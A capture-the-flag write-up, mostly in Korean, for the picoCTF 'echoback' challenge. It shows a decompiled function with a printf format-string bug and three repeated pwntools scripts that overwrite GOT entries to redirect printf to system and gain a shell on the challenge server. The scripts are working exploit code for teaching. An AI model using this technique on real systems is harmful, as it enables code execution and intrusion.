// pseudo-code | |
// Decompiler (IDA-style) view of the target's vulnerable function; the
// trailing '| |' on each line is table-extraction residue, not code.
//
// Reads up to 0x7F bytes from stdin into a zeroed 0x80-byte stack buffer
// and then hands that buffer to printf() AS THE FORMAT STRING (CWE-134).
// That one call is the whole bug: '%x' conversions leak stack contents and
// '%n'/'%hn' conversions write attacker-chosen values to attacker-chosen
// addresses.  The fix is printf("%s", &buf) (or fputs/puts).
int vuln() | |
{ | |
// 'char buf' is the decompiler's rendering of the array; the stack offsets
// bp-0x8C .. bp-0xC span 0x80 bytes, matching the memset()/read() sizes.
char buf; // [sp+Ch] [bp-8Ch]@1 | |
int v2; // [sp+8Ch] [bp-Ch]@1 | |
// Stack canary loaded from gs:0x14.  It only catches overwrites of the
// canary/return address on the stack; the GOT writes the exploit performs
// never touch that region, so the check at the bottom still passes.
v2 = *MK_FP(__GS__, 20); | |
// Zero-fill, then read one byte fewer than the buffer size: the input is
// therefore always NUL-terminated and printf() stops at the end of what
// was sent.
memset(&buf, 0, 0x80u); | |
// system() is only used with a fixed string here, but its presence is
// what gives the binary a system@plt stub for the exploit to point
// printf@got at.
system("echo input your message:"); | |
read(0, &buf, 0x7Fu); | |
// BUG: user-controlled format string.  Should be printf("%s", &buf).
printf(&buf); | |
// puts() is reached through its GOT entry; once the exploit has pointed
// puts@got at vuln(), this call re-enters the function for another round.
puts("\n"); | |
puts("Thanks for sending the message!"); | |
// Canary comparison; the decompiler shows it as the return value, the real
// binary presumably calls __stack_chk_fail on mismatch (confirm in the
// disassembly).
return *MK_FP(__GS__, 20) ^ v2; | |
} | |
// Entry point as decompiled.  Sets up I/O and group credentials, then runs
// vuln() exactly once: the exploit's repeated rounds come from redirecting
// puts@got back to vuln(), not from any loop here.
int __cdecl main(int argc, const char **argv, const char **envp) | |
{ | |
__gid_t v3; // ST18_4@1 | |
// Mode 2 is _IONBF in glibc, i.e. unbuffered; '_bss_start' is the
// decompiler's label for the stream, presumably stdout (confirm in the
// disassembly).  Unbuffered output is why the prompt arrives before read().
setvbuf(_bss_start, 0, 2, 0); | |
// Real, effective and saved GID all become the current effective GID, so a
// shell spawned via system() keeps that group -- the usual setgid CTF setup
// for reading the flag (assumption; not visible here).
v3 = getegid(); | |
setresgid(v3, v3, v3); | |
vuln(); | |
return 0; | |
} |
point
1. FSB(Format String Bug)
2. GOT overwrite
* FSB 자세한 정리 : https://pu1et-panggg.tistory.com/22
어디부터 쓸 수 있는지 확인: 입력 버퍼가 printf의 몇 번째 인자 자리에 오는지(`AAAA%x%x...` 또는 `%N$x`로 탐색) 먼저 확인한다. 이 바이너리에서는 버퍼가 7번째 인자(%7$)부터 시작하므로 아래 페이로드는 %7$hn, %8$hn을 쓴다.
총 크게 두 가지 방법이 있다. (둘 다 바이너리 주소가 고정(no PIE)이고 GOT가 쓰기 가능(Full RELRO 아님)해야 하므로, checksec으로 먼저 확인한다.)
1. got 주소 알아내서 FSB로 got overwrite
printf@got <- system@plt
puts@got <- vuln주소(0x80485ab)
gdb(peda)의 elfsymbol + readelf -s echoback 으로 아래 주소를 얻는다. (got는 objdump -R, plt는 objdump -d 로도 확인 가능)
printf@got : 0x804a010
puts@got : 0x804a01c
system@plt : 0x8048460
vuln : 0x80485ab
1-1. 값의 하위 2byte를 먼저, 그 다음 상위 2byte를 overwrite (%hn 두 번)
ex) 0x804a010을 쓸 경우, 0xa010을 먼저 쓰고 0x0804를 쓴다. %hn은 지금까지 출력한 글자 수의 하위 16bit를 쓰므로, 이미 0xa010자를 출력한 뒤 0x0804를 만들려면 두 번째 폭은 (0x0804 - 0xa010) mod 0x10000 으로 계산해야 한다. 아래 스크립트의 `0x10000 +`는 음수를 피하려는 것인데, 뒤의 `& 0xffff`가 이미 mod를 취하므로 0x10000은 출력 길이만 늘릴 뿐 없어도 된다.
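import struct


def p32le(value):
    """Little-endian 32-bit pack (stdlib stand-in for pwntools' p32)."""
    return struct.pack('<I', value & 0xffffffff)


def fmt_write32(where, what, arg_index, low_first=True):
    """Build a format string that writes the 32-bit value `what` to `where`.

    The write is split into two 2-byte '%hn' writes so the padding stays
    well under the target's 0x7F-byte read limit.  Layout of the result:

        [addr1][addr2] %<pad1>x %<arg_index>$hn %<pad2>x %<arg_index+1>$hn

    `arg_index` is the positional printf argument on which the first 4-byte
    address lands (7 for echoback: the input buffer starts at the 7th
    argument; this is binary-specific and found by probing).  The '%<pad>x'
    conversions carry no '$' and pop the next sequential argument, exactly
    as in the original payload; glibc tolerates mixing positional and
    sequential conversions, but it is not portable.

    low_first=True  writes the low half, then the high half (method 1-1).
    low_first=False writes the high half, then the low half (method 1-2).
    Either order works: each pad is taken modulo 0x10000 from the running
    character count, so it can never be negative ('%-Nx' would be parsed as
    a left-justify flag).  The pad is also kept >= 8 because '%Nx' is a
    *minimum* width and the popped 32-bit argument may print up to 8 hex
    digits (and '%0x' is a flag, not width 0).

    Raises ValueError if an address contains a NUL byte: printf() would
    stop parsing the format before reaching the '%hn'.
    """
    lo = what & 0xffff
    hi = (what >> 16) & 0xffff
    if low_first:
        writes = [(where, lo, arg_index), (where + 2, hi, arg_index + 1)]
    else:
        writes = [(where + 2, hi, arg_index), (where, lo, arg_index + 1)]

    addrs = b''.join(p32le(addr) for addr, _, _ in writes)
    if b'\x00' in addrs:
        raise ValueError('target address contains a NUL byte; printf would stop early')

    printed = len(addrs)  # the addresses themselves are echoed first
    fmt = b''
    for _, half, idx in writes:
        pad = (half - printed) % 0x10000
        if pad < 8:
            pad += 0x10000
        fmt += b'%' + str(pad).encode() + b'x%' + str(idx).encode() + b'$hn'
        printed += pad
    return addrs + fmt


if __name__ == '__main__':
    from pwn import remote  # only the network part needs pwntools

    # Addresses from readelf -s / gdb elfsymbol.  Valid only for this build
    # (no PIE) and only while the GOT is writable (no Full RELRO) -- confirm
    # with checksec before relying on them.
    PUTS_GOT = 0x804a01c
    PRINTF_GOT = 0x804a010
    SYSTEM_PLT = 0x8048460
    VULN = 0x80485ab
    FMT_ARG = 7  # printf argument index where the input buffer begins
    READ_MAX = 0x7F  # read(0, &buf, 0x7F) in vuln(); +1 for sendline's '\n'

    p = remote('2018shell1.picoctf.com', 37857)
    print(p.recvuntil(b'input your message:'))

    # Round 1: puts@got -> vuln, so the puts("\n") after printf re-enters vuln().
    payload = fmt_write32(PUTS_GOT, VULN, FMT_ARG)
    if len(payload) + 1 > READ_MAX:
        raise SystemExit('payload exceeds the read() size')
    p.sendline(payload)
    print(p.recvuntil(b'input your message:'))

    # Round 2: printf@got -> system@plt.  From the next round on the input
    # goes to system() instead of printf(), so type a command at the prompt.
    payload = fmt_write32(PRINTF_GOT, SYSTEM_PLT, FMT_ARG)
    if len(payload) + 1 > READ_MAX:
        raise SystemExit('payload exceeds the read() size')
    p.sendline(payload)
    p.interactive()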
1-2. 값의 상위 2byte를 먼저, 그 다음 하위 2byte를 overwrite
ex) 0x804a010을 쓸 경우, 0x0804를 먼저 쓰고 0xa010을 쓴다. 이 순서는 하위 2byte 값이 상위 2byte 값보다 클 때만 폭이 양수가 된다(여기서는 0x85ab > 0x0804, 0x8460 > 0x0804). 반대 경우 아래 스크립트의 두 번째 폭이 음수가 되어 `%-Nx`(왼쪽 정렬 플래그)로 해석되므로, 일반적으로는 (목표값 - 지금까지 출력한 글자 수) mod 0x10000 으로 계산해야 한다.
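import struct


def p32le(value):
    """Little-endian 32-bit pack (stdlib stand-in for pwntools' p32)."""
    return struct.pack('<I', value & 0xffffffff)


def fmt_write32(where, what, arg_index, low_first=True):
    """Build a format string that writes the 32-bit value `what` to `where`.

    The write is split into two 2-byte '%hn' writes so the padding stays
    well under the target's 0x7F-byte read limit.  Layout of the result:

        [addr1][addr2] %<pad1>x %<arg_index>$hn %<pad2>x %<arg_index+1>$hn

    `arg_index` is the positional printf argument on which the first 4-byte
    address lands (7 for echoback: the input buffer starts at the 7th
    argument; this is binary-specific and found by probing).  The '%<pad>x'
    conversions carry no '$' and pop the next sequential argument, exactly
    as in the original payload; glibc tolerates mixing positional and
    sequential conversions, but it is not portable.

    low_first=True  writes the low half, then the high half (method 1-1).
    low_first=False writes the high half, then the low half (method 1-2,
    the order this script uses).  Either order works: each pad is taken
    modulo 0x10000 from the running character count, so it can never be
    negative -- the original 1-2 payload computed (low - high) unreduced and
    would have emitted '%-Nx' (a left-justify flag) whenever low < high.
    The pad is also kept >= 8 because '%Nx' is a *minimum* width and the
    popped 32-bit argument may print up to 8 hex digits (and '%0x' is a
    flag, not width 0).

    Raises ValueError if an address contains a NUL byte: printf() would
    stop parsing the format before reaching the '%hn'.
    """
    lo = what & 0xffff
    hi = (what >> 16) & 0xffff
    if low_first:
        writes = [(where, lo, arg_index), (where + 2, hi, arg_index + 1)]
    else:
        writes = [(where + 2, hi, arg_index), (where, lo, arg_index + 1)]

    addrs = b''.join(p32le(addr) for addr, _, _ in writes)
    if b'\x00' in addrs:
        raise ValueError('target address contains a NUL byte; printf would stop early')

    printed = len(addrs)  # the addresses themselves are echoed first
    fmt = b''
    for _, half, idx in writes:
        pad = (half - printed) % 0x10000
        if pad < 8:
            pad += 0x10000
        fmt += b'%' + str(pad).encode() + b'x%' + str(idx).encode() + b'$hn'
        printed += pad
    return addrs + fmt


if __name__ == '__main__':
    from pwn import remote  # only the network part needs pwntools

    # Addresses from readelf -s / gdb elfsymbol.  Valid only for this build
    # (no PIE) and only while the GOT is writable (no Full RELRO) -- confirm
    # with checksec before relying on them.
    PUTS_GOT = 0x804a01c
    PRINTF_GOT = 0x804a010
    SYSTEM_PLT = 0x8048460
    VULN = 0x80485ab
    FMT_ARG = 7  # printf argument index where the input buffer begins
    READ_MAX = 0x7F  # read(0, &buf, 0x7F) in vuln(); +1 for sendline's '\n'

    p = remote('2018shell1.picoctf.com', 37857)
    print(p.recvuntil(b'input your message:'))

    # Round 1: puts@got -> vuln (high half first), so the puts("\n") after
    # printf re-enters vuln().
    payload = fmt_write32(PUTS_GOT, VULN, FMT_ARG, low_first=False)
    if len(payload) + 1 > READ_MAX:
        raise SystemExit('payload exceeds the read() size')
    p.sendline(payload)
    print(p.recvuntil(b'input your message:'))

    # Round 2: printf@got -> system@plt.  From the next round on the input
    # goes to system() instead of printf(), so type a command at the prompt.
    payload = fmt_write32(PRINTF_GOT, SYSTEM_PLT, FMT_ARG, low_first=False)
    if len(payload) + 1 > READ_MAX:
        raise SystemExit('payload exceeds the read() size')
    p.sendline(payload)
    p.interactive()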
2. ELF 사용해서 FSB로 got overwrite
binary = ELF('./echoback')
plt 주소는 binary.symbols['plt.system'] (최신 pwntools에서는 binary.plt['system'])
got 주소는 binary.symbols['got.puts'] (최신 pwntools에서는 binary.got['puts'])
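import struct


def p32le(value):
    """Little-endian 32-bit pack (stdlib stand-in for pwntools' p32)."""
    return struct.pack('<I', value & 0xffffffff)


def fmt_write32(where, what, arg_index, low_first=True):
    """Build a format string that writes the 32-bit value `what` to `where`.

    The write is split into two 2-byte '%hn' writes so the padding stays
    well under the target's 0x7F-byte read limit.  Layout of the result:

        [addr1][addr2] %<pad1>x %<arg_index>$hn %<pad2>x %<arg_index+1>$hn

    `arg_index` is the positional printf argument on which the first 4-byte
    address lands (7 for echoback: the input buffer starts at the 7th
    argument; this is binary-specific and found by probing).  The '%<pad>x'
    conversions carry no '$' and pop the next sequential argument, exactly
    as in the original payload; glibc tolerates mixing positional and
    sequential conversions, but it is not portable.

    low_first=True  writes the low half, then the high half (method 1-1).
    low_first=False writes the high half, then the low half (method 1-2).
    Either order works: each pad is taken modulo 0x10000 from the running
    character count, so it can never be negative ('%-Nx' would be parsed as
    a left-justify flag).  The pad is also kept >= 8 because '%Nx' is a
    *minimum* width and the popped 32-bit argument may print up to 8 hex
    digits (and '%0x' is a flag, not width 0).

    Raises ValueError if an address contains a NUL byte: printf() would
    stop parsing the format before reaching the '%hn'.
    """
    lo = what & 0xffff
    hi = (what >> 16) & 0xffff
    if low_first:
        writes = [(where, lo, arg_index), (where + 2, hi, arg_index + 1)]
    else:
        writes = [(where + 2, hi, arg_index), (where, lo, arg_index + 1)]

    addrs = b''.join(p32le(addr) for addr, _, _ in writes)
    if b'\x00' in addrs:
        raise ValueError('target address contains a NUL byte; printf would stop early')

    printed = len(addrs)  # the addresses themselves are echoed first
    fmt = b''
    for _, half, idx in writes:
        pad = (half - printed) % 0x10000
        if pad < 8:
            pad += 0x10000
        fmt += b'%' + str(pad).encode() + b'x%' + str(idx).encode() + b'$hn'
        printed += pad
    return addrs + fmt


if __name__ == '__main__':
    from pwn import ELF, remote  # only this part needs pwntools

    binary = ELF('./echoback')
    # Fixed addresses need a non-PIE binary, and a GOT overwrite needs a
    # writable GOT; fail loudly instead of sending a payload that cannot work.
    if binary.pie:
        raise SystemExit('PIE binary: the fixed GOT/PLT addresses will not hold')
    if binary.relro == 'Full':
        raise SystemExit('Full RELRO: the GOT is read-only')

    # pwntools exposes the PLT/GOT tables directly; the older spelling was
    # binary.symbols['got.puts'] / binary.symbols['plt.system'].
    puts_got = binary.got['puts']
    printf_got = binary.got['printf']
    system_plt = binary.plt['system']
    vuln = binary.symbols['vuln']
    FMT_ARG = 7  # printf argument index where the input buffer begins
    READ_MAX = 0x7F  # read(0, &buf, 0x7F) in vuln(); +1 for sendline's '\n'

    p = remote('2018shell1.picoctf.com', 37857)
    print(p.recvuntil(b'input your message:'))

    # Round 1: puts@got -> vuln, so the puts("\n") after printf re-enters vuln().
    payload = fmt_write32(puts_got, vuln, FMT_ARG)
    if len(payload) + 1 > READ_MAX:
        raise SystemExit('payload exceeds the read() size')
    p.sendline(payload)
    print(p.recvuntil(b'input your message:'))

    # Round 2: printf@got -> system@plt.  From the next round on the input
    # goes to system() instead of printf(), so type a command at the prompt.
    payload = fmt_write32(printf_got, system_plt, FMT_ARG)
    if len(payload) + 1 > READ_MAX:
        raise SystemExit('payload exceeds the read() size')
    p.sendline(payload)
    p.interactive()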